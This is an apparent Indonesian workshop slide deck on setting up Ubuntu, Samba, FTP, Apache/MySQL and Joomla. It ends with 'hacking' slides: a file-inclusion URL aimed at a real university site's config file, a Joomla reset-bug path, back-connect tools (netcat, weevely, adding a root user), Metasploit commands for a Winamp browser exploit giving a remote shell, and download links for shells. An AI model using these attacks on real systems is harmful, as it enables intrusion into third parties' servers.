Upload
zerokid-zerokid
View
237
Download
1
Embed Size (px)
Citation preview
WORKSHOP & PELATIHAN
SUGIARTO,ST
MAKSUD & TUJUAN
• Memotivasi semangat belajar
• Meningkatkan kemampuan bidang jaringan
dan server
• Melatih pengaplikasian ilmu di perkuliahan• Melatih pengaplikasian ilmu di perkuliahan
MATERI
• INSTALASI LINUX (UBUNTU)
• SETTING MODEM
• CEK SISTEM SERVER
• INSTALASI SERVER WEB, FTP, SAMBA• INSTALASI SERVER WEB, FTP, SAMBA
• INSTALASI SCANNING TOOLS
• APLIKASI WEB SEDERHANA
• ANALISA SERVER
• HACKING SERVER LINUX
INSTALASI LINUX
• Booting CD/DVD Room or
Flashdisk
• Jika pakai VM Ware dapat
gunakan file ISOgunakan file ISO
• Ikuti step by step alur
instalasi
• Gunakan nama host dan
admin yang berbeda
INSTALL MODEM
• Jika modem memiliki driver support Linux
maka bisa langsung install. Biasanya file
berupa *DEB.
• Jika modem tidak ada driver support Linux • Jika modem tidak ada driver support Linux
dari defaultnya maka dapat cari driver for
Linux di google.com
• Jika memang tidak ditemukan juga maka
dapat menggunakan cara berikut ini
INSTALL MODEM
• Buka command terminal
• Ketik “lsusb”
• sudo ls –al /dev/ttyUSB*
INSTALL MODEM
INSTALL MODEM
• Jika sudah muncul /dev/ttyUSB2 berarti
modem sudah terdeteksi dan langsung dapat
dikoneksikan
• Klik simbol koneksi di sudut kanan atas• Klik simbol koneksi di sudut kanan atas
• Lalu koneksikan
CEK SUBSTANSI SERVER
1. Ceck Kernel Version
Uname –rm
2. Ceck IP / Protocol
3. Ceck root / administrator3. Ceck root / administrator
4. Ceck Service yang ada
5. etc
PENGETAHUAN LINUX DASAR
SINTAX DASAR
• Whoami , uname –a ,uname –rm , id
• Ls , cd , dir , pwd
• Cp, rm ,rmdir
• Date, cal• Date, cal
• Cat, nano, gedit
• Ifconfig ,iwconfig
• Mkdir, chmod
• Tar, unzip, unrar
INSTALASI SAMBA SERVER
• Merupakan layanan sharing data ataudokumen. Tahapan instalasi samba server adalah:
• Buka terminal, ketik : sudo apt-get install • Buka terminal, ketik : sudo apt-get install samba atau kalau dalam distro yang lain makaharus disesuaiakan dengan sintax karakterdalam eksekusinya.
• Restart samba dengan perintah:
• /etc/init.d/samba restart
FTP SERVER
• FTP atau file transfer protocol merupakan fasilitas/mediayang diperuntukaan dalam peng-uplod-an atau pundownload semacam media sharing data naming dapatsecara online via broser dengan mengakses halaman/pageftp://[alamat_domain_atau_ip]
• Instalasi FTP server• Instalasi FTP server
• Buka synaptic manager lalu mark pada bagian proftpd,atau bisa juga dengan perintah Shell: apt-get installproftpd
• Restart: /etc/init.d/proftpd
• Jika ingin mengganti port dapat mengubah pada file/etc/proftpd/proftpd.conf lalu sinkron-kan dengan fileports.conf
WEBSERVER
1. Jika melalui synaptic packet manager maka Markbagian “apache2”
2. Restart apache dengan ketik /etc/init.d/apache2restart
3. Setting file /etc/apache2/ports.conf dengan editor(vi/pico/gedit) jiika akan mengganti port web server,
3. Setting file /etc/apache2/ports.conf dengan editor(vi/pico/gedit) jiika akan mengganti port web server,tapi jika ingin menggunakan default yakni port 80 makabiarkan saja tidak perlu disetting.
4. Jika ingin mengubah posisi file dokumen web, dapatmengedit file etc/apache2/sites-available/default laluedit/ganti dibagian DocumentRoot /VAR/WWW gantisesuai posisi yang diinginkan
5. Untuk alasan keamanan, lebih baik ganti opsi
“ServerSignature on” menjadi “ServerSignature off”
6. Install modul php dengan ketik : sudo apt-get install php5
7. Berikutnya adalah menginstall database mysql, dpat
melalui synaptic packet manager dengan Mark pada
bagian: libapache2-mod-auth-mysql
8. Selanjutnya instalasi paket konektor PHP5 dan MySQL8. Selanjutnya instalasi paket konektor PHP5 dan MySQL
melalui synaptic packet manager dengan Mark pada
bagian: php5-mysql
9. Ketik gedit /etc/php5/apache2/php.ini ,cari baris dengan
kata ;extension=mysql.so hilangkan tanda titik
komanya.
10. Restart mysql dengan perintah /etc/init.d/apache2
restart
11. Install PHPMYADMIN dengan cara Mark pada
synaptic packet manager pada bagian “phpmyadmin”
12. Ketik gedit /etc/apache2/apache2.conf buat alias
baru bernama “phpmyadmin” dan diarahkan ke/usr/share/phpmyadmin
Alias /phpmyadmin “/usr/share/phpmyadmin/”Alias /phpmyadmin “/usr/share/phpmyadmin/”
<Directory “/usr/share/phpmyadmin”>
Options Indexes MultiViews
………………dsb………
13. Untuk mengecek silakan masuk ke mysql dengan
perintah mysql –u root –p atau bisa juga melalui
browser dengan ketik : http://localhost/phpmyadmin
• Web server dengan instalasi paket installer
tambahan (unduhan)
• Paket tambahan ini dapat gunakan XAMPP for
linux, WAMPP for linux, Nginx for linux dan
lain sebagainya. Untuk proses instalasinyalain sebagainya. Untuk proses instalasinya
dapat dibaca pada petunjuk Readme pada
masing-masing paket.
SCANNING TOOLS
• Install NMap
• Buka command terminal
• Ketik “apt-get nmap”
• Atau bisa jug pakai synaptic• Atau bisa jug pakai synaptic
• Bila belum ada synaptic maka install dengan
cara mengetik “apt-get install synaptic” pada
terminal dengan sebelumnya login sebagai
root.
DEVELOP SIMPLE WEB
• Gunakan CMS
• CMS adalah tools pembuatan content website
secara simple dan praktis
• Ada beberapa CMS yang terkenal: Wordpress, • Ada beberapa CMS yang terkenal: Wordpress,
Joomla!, Drupal, Lokomedia
• Pada studi kali ini kita gunakan Joomla!
INSTALASI JOOMLA
• Taruh file install packet pada direktori /var/www
atau jika menggunakan xampp terletak pada
directory /opt/lampp/htdocs
• Buka browser lalu ketik localhost/phpmyadmin• Buka browser lalu ketik localhost/phpmyadmin
• Buat database
• Buka browser ketik localhost/joomla
• Ikuti step by step proses instalasi
ANALISA KEAMANAN SERVER
• Scanning server all port & systems
• Scanning aplication , ex: web
• Find Vulnerability
• Get Exploit• Get Exploit
HACKING WEBSITE [dasar]
1. SQL Injection with tools & without tools
2. XSS
3. RFI (analisting) http://www.stainkudus.ac.id/downlot.php?file=../config/koneksi.phphttp://www.stainkudus.ac.id/downlot.php?file=../config/koneksi.php
4. Etc [pertemuan berikutnya]
Reset Bug Joomla!
index.php?option=com_user&view=reset&layout=confirm
Back Connect
• Netcat
• Weevely
• Eksekusi exploit kerner
• Add user Root• Add user Root
DEMO HACKING WIN 7
• Exploit Winnamp
use exploit/windows/browser/winamp_playlist_unc
set lhost …
set srvhost …
set uripath winamp
exploit
sessions
sessions -i 1....
execute -M -f cmd.exe -i
DOWNLOAD TOOLS
• http://www.4shared.com/zip/cMSTDFC2ce/netcat-071.html
• http://www.4shared.com/file/knncrJrZba/2637.html
• http://www.4shared.com/file/SfCv7w2Tba/2631-• http://www.4shared.com/file/SfCv7w2Tba/2631-2010.html
• http://www.4shared.com/rar/tKOToESIba/SHELL.html
• http://www.4shared.com/rar/MqMhp4Ycba/nc_online.html
TIPS & TRIK
• Ubah password Lamppmysql -u root –p
select user,password,host from mysql.user;
update mysql.user set Password=PASSWORD(‘password-baru’) where
user=’root’; flush privileges;user=’root’; flush privileges;
• Atau
/opt/lampp/lampp security
SEMOGA BERMANFAAT
• Pergunakan kemampuan untuk menolong
sesama
• Ilmu diciptakan untuk kebaikan dan
mempermudah mendapat pahala bukanmempermudah mendapat pahala bukan
untuk mencelakakan
• Amalan yang masih mengalir ketika manusia
telah tiada adalah Ilmu yang bermanfaat
• DIATAS LANGIT MASIH ADA LANGIT
Be The Best By MySelf